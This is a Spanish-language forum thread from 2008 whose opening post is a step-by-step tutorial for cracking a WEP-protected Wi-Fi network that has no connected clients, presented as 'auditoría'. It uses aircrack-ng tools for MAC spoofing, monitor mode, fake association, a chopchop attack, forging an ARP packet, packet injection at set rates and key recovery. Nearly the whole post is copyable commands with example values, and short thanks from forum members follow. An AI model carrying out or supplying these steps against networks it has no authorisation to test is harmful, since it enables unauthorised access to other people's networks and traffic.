Seguridad Wireless - Wifi

Suite Seguridad Wireless => Manuales de Wifislax & Wifiway => Mensaje iniciado por: manel en 21-11-2008, 15:17 (Viernes)

Título: Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes
Publicado por: manel en 21-11-2008, 15:17 (Viernes)
Buenas,

Lo poco que se de auditoria lo he aprendido en este foro. Si puedo quitar algo de trabajo a los que lo hacen posible , me daré por satisfecho. Gracias por vuestra paciencia   >:( >:( >:(

El tuto está hecho con wifiway 1.0, pero puede servir cualquier versión de wifislax.
Puntualizar que el chop-chop no siempre funciona, pero al forjar nosotros el arp, la inyección es inmediata.

Al lio:

Los drivers de inyección de la bosslan/alfa ya vienen cargados.
Abrimos una consola y tecleamos:

   #iwconfig

(http://lh4.ggpht.com/_KYzSJhgVMKU/SSF91IOSxKI/AAAAAAAAAEA/42xCCT8y9uc/s800/snapshot1.png) (http://picasaweb.google.es/lh/photo/v7ztsps7TYGA8lcv_Mcl-g)

Copiamos nuestra iface, en este caso wlan0. Vamos a cambiarle la mac:

   #macchanger -m 00:01:02:03:04:05 wlan0

El sistema responde:

(http://lh6.ggpht.com/_KYzSJhgVMKU/SSK6gLyj9ZI/AAAAAAAAAGk/rQpJP-7taxI/s800/snapshot2.png) (http://picasaweb.google.es/lh/photo/PK2EitHW1FSbM6ZJvbxCqg)

Ponemos la tarjeta en modo monitor:

   #airmon-ng start wlan0

El sistema responde:

(http://lh6.ggpht.com/_KYzSJhgVMKU/SSF91eqP2EI/AAAAAAAAAEQ/Kb1Y0AP7WQA/s800/snapshot3.png) (http://picasaweb.google.es/lh/photo/bcy58yS0H1wkkkaHYosgtQ)

Tenemos  todo a punto, lanzamos el airodump para ver nuestro AP.
Tecleamos:

   #airodump-ng wlan0

Veremos una lista de los AP:

(http://lh4.ggpht.com/_KYzSJhgVMKU/SSLCiHcVh1I/AAAAAAAAAHM/BBtsVDnQvUc/s800/snapshot4.png) (http://picasaweb.google.es/lh/photo/XhiINsHV7_DFnvhOrDJcRw)

Cuando veamos nuestro AP en la lista pulsamos Ctrl + c, se nos parará el airodump, nos fijaremos en el BSSID (MAC de nuestro AP), el canal y el ESSID (nombre de nuestro AP).

Ahora volveremos a abrir el airodump con las opciones: -c (para filtrar por canal), la opción -b (filtrar por BSSID) y la opción -w para que nos cree un archivo donde se nos guardarán los ivs. El nombre del archivo puede ser cualquiera.

   #airodump-ng -c [nº_canal] -b [bssid] -w [nombre_archivo] [iface]

En nuestro caso:

   #airodump-ng -c 9 -b 00:02:CF:XX:XX:XX -w captura wlan0

El sistema responde:

(http://lh3.ggpht.com/_KYzSJhgVMKU/SSLCigN-tAI/AAAAAAAAAHU/RQUOtP1AY90/s800/snapshot5.png) (http://picasaweb.google.es/lh/photo/ROLpb78jAWpbHKkgRDcjhQ)

Lo dejamos abierto, abrimos otra consola para asociarnos al AP, ataque 1 ó asociación falsa:

   #aireplay-ng -1 10 -a [bssid] -h [mac_nuestra_tarjeta] [iface]

Nuestro ejemplo:

   #aireplay-ng -1 10 -a 00:02:CF:XX:XX:XX -h 00:01:02:03:04:05 wlan0

Si todo va bien, tenemos que ver esto:

(http://lh5.ggpht.com/_KYzSJhgVMKU/SSMOghsXHoI/AAAAAAAAAIY/y1nnqE_n-Ig/s800/snapshot6.png) (http://picasaweb.google.es/lh/photo/i3QbRuQeR8oRPasR34bWyw)


Una vez asociados, dejamos la consola abierta y abrimos otra donde lanzaremos el ataque 4 (chopchop), para conseguir un paquete de datos WEP:

   #aireplay-ng -4 -h [mac_nuestra_tarjeta] [iface]

Sigamos con nuestro ejemplo:

   #aireplay-ng -4 -h 00:01:02:03:04:05 wlan0

Puede tardar más o menos pero nos tiene que salir algo así:


(http://lh4.ggpht.com/_KYzSJhgVMKU/SSMOhNPAsXI/AAAAAAAAAIg/jTMGVCREErU/s800/snapshot7.png) (http://picasaweb.google.es/lh/photo/oCvkSlZhA1TLvizj1orv2w)

Nos pregunta si queremos utilizar este paquete, le decimos que y.

(http://lh5.ggpht.com/_KYzSJhgVMKU/SSF-QV-22rI/AAAAAAAAAE8/mdm7qenftUo/s800/snapshot8.png) (http://picasaweb.google.es/lh/photo/z1-RGXvyyzwnSoVnvtfoWg)

Nos ha creado dos archivos, uno .cap y otro .xor.
Abriremos el .cap con el tcpdump para ver la ip de nuestro AP.

   #tcpdump -s 0 -n -e -r [archivo.cap]

En nuestro caso:

   #tcpdump -s 0 -n -e -r replay_dec-1117-143113.cap

Nos responde:
   
(http://lh4.ggpht.com/_KYzSJhgVMKU/SSMOhAsQFdI/AAAAAAAAAIo/3ZTiszN868Y/s800/snapshot9.png) (http://picasaweb.google.es/lh/photo/nAOd3QNh4eeUWIxaqy5zQg)

Vemos la ip del AP: 192.168.1.1 (el 520 no se lo que es), pero siempre serán los cuatro primeros números.
Ahora con el packetforge vamos a forjar un arp para poder inyectarlo:

   #packetforge-ng -0 -a [bssid] -h [mac_nuestra_tarjeta] -k [ip_origen] -l [ip_destino] -y [archivo.xor] -w [nombre_arp_que_creamos]

La ip de origen puede ser cualquiera dentro del rango, la de destino tiene que ser la del AP, y -w sera el arp, ponemos cualquier nombre.En nuestro caso:

  #packetforge-ng -0 -a 00:02:CF:XX:XX:XX -h 00:01:02:03:04:05 -k 192.168.1.255 -l 192.168.1.1 -y replay_dec-1117-143113.xor -w arp

(http://lh6.ggpht.com/_KYzSJhgVMKU/SSMOhQwhmqI/AAAAAAAAAIw/Xi4zi4ByZqg/s800/snapshot10.png) (http://picasaweb.google.es/lh/photo/9pjy_Cj2rIJ-fWNvW8eSPA)

Wrote packet to: arp, ya tenemos nuestro arp.
Ahora vamos a inyectarlo con aireplay-ng -2:

  #aireplay-ng -2 -h [mac_nuestra_tarjeta] -r [archivo_arp] [iface]

Nosotros le añadimos la opción -x 1024, para que inyecte 1024 paquetes por segundo, por defecto son 600 (creo). Algunos AP se saturan al inyectar a 1024, o pude que incluso se bloqueen con la opción por defecto, (600), si vemos que al lanzar el A2 empieza a inyectar, y se para a los  pocos segundos, relanzaremos el A2 añadiendo la opción -x 300.

    #aireplay-ng -2 -x 1024 -h 00:01:02:03:04:05 -r arp wlan0

(http://lh4.ggpht.com/_KYzSJhgVMKU/SSMOhsxymFI/AAAAAAAAAI4/A72auV8rgiU/s800/snapshot11.png) (http://picasaweb.google.es/lh/photo/NhJ-9ZDE5_tnek4KN6Bu8w)

Le respondemos que y , y si nada ha fallado ya estamos inyectando.
Nos vamos al airodump y lo comprobamos:

(http://lh4.ggpht.com/_KYzSJhgVMKU/SSMPJXHHCII/AAAAAAAAAJA/5ICWFMrWsPw/s800/snapshot12.png) (http://picasaweb.google.es/lh/photo/8FEaiIqFxICnycc3RJUvbA)

Solo nos queda esperar que suban los #data y lanzar el aircrack. A diferencia del A3, aquí no nos suben los arp, por tanto el ptw no nos sirve. necesitaremos más #data. Sin cerrar nada, abrimos otra consola y lanzamos el aircrack:

  #aircrack [archivo_captura]-01.cap

Nosotros:

   #aircrack captura-01.cap

(http://lh4.ggpht.com/_KYzSJhgVMKU/SSMPJ2SRd5I/AAAAAAAAAJI/r_Ix_rGMmio/s800/snapshot14.png) (http://picasaweb.google.es/lh/photo/3a3q3ChCp685iAkrPBvGwg)

Suerte y paciencia...



Título: Re: Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes
Publicado por: ovni00 en 21-11-2008, 15:37 (Viernes)
lo unico que puedo decir es :

 >:( >:( >:(felicitaciones  gran tuto  >:( >:( >:( >:(

esta todo muy bien detallado


se agradece demasiado >:( >:(



saludos
Título: Re: Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes
Publicado por: venturi en 22-11-2008, 17:20 (Sábado)
si señor , un tutorial genial , gracias! ;)
Título: Re: Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes
Publicado por: manel en 23-11-2008, 08:46 (Domingo)
 ;) ;) ;)

Un saludo
Título: Re: Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes
Publicado por: *dudux en 23-11-2008, 13:44 (Domingo)
muy bueno ....solo un detalle de estos manuales graficos..que cuando caen los servers de hosting de imgenes n6 se entiende na
 >:(
Título: Re: Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes
Publicado por: manel en 23-11-2008, 14:51 (Domingo)
Buenas:

Los he subido a picassa, espero que duren...

Un saludo
Título: Re: Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes
Publicado por: drvalium en 23-11-2008, 19:58 (Domingo)

buena guia >:( >:( >:(

le pongo una chincheta ;)



saludos
Título: Re: Chop-chop con bosslan/alfa A1 + A4 + A2 sin clientes
Publicado por: Hwagm en 03-12-2008, 21:04 (Miércoles)
he mandado esta guia a la seccion de manuales